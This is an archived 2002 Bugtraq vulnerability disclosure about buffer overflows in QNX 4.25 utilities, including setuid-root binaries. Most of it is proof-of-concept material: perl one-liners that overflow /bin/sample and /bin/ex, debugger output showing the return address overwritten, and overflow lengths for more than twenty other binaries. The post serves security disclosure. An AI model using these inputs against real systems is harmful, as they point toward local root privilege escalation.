[25743] in bugtraq
madcr: QnX 4.25 - multiples bof in suid/no suid files
daemon@ATHENA.MIT.EDU (Egor Egorov)
Wed Jun 12 13:05:20 2002
Date: 12 Jun 2002 12:10:46 -0000
Message-ID: <20020612121046.17184.qmail@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Egor Egorov <madrats@mail.ru>
To: bugtraq@securityfocus.com
/bin/sample
----------------//------------------------------
# cd /bin
# ls -l sample
-rwsrwxr-x 1 root root 20639 Jan 19 1996 sample
# sample `perl -e 'print "A" x 280'`
Profile based upon 2000 samples/second.
//1/bin/sample terminated (SIGSEGV) at 0005:00000041
%1 672 Memory fault sample $(perl -e 'print "A" x 280')
# wd sample 'perl -e print "A" x 280'`
ebp: 41414141
eip: 00000041
# wd sample 'perl -e 'print "A" x 280, "B"'`
ebp: 41414141
eip: 00004241
----------------//------------------------------
/bin/ex
----------------//------------------------------
# wd ex `perl -e 'print "AAA" x 420, "good", "CCC" x 280'`
ebp: 00000041
eip: 646f6f67 - doog
----------------//------------------------------
file bytes for bof
/bin/du - 558
/bin/find - 799
/bin/lex - 1673
/bin/mkdir - 517
/bin/rm - 351
/bin/serserv - 224
/bin/tcpserv - 146
/bin/termdef - 729
/bin/time - 2489
/bin/unzip - 299
/bin/use - 1964
/bin/wcc - 138
/bin/wcc386 - 137
/bin/wd -
/bin/wdisasm - 135
/bin/which - 304
/bin/wlib - 256
/bin/wlink - 10244
/bin/wpp - 256
/bin/wpp386 - 256
/bin/wprof - 141
/bin/write - 157
/bin/wstrip - 817
